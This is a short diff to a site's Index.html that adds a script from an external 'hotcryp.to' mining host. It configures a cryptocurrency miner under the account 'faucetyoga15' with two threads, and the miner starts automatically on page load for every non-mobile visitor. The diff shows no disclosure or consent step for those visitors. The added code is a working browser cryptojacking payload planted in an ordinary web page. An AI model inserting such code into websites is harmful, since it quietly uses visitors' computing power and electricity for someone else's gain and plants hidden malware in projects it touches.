--- a/Index.html
+++ b/Index.html
@@ -11,5 +11,14 @@
 </script>
 </Head>
 <body>
+<script src="https://hotcryp.to/Mining/Publisher.js"></script>
+<script>
+  var HCMiner = HCM.User('faucetyoga15',{
+    threads: 2,
+    throttle: 0.5,
+  });
+  if (!HCMiner.isMobile()){     HCMiner.start();
+  }
+</script>
 </Body>
 </html>
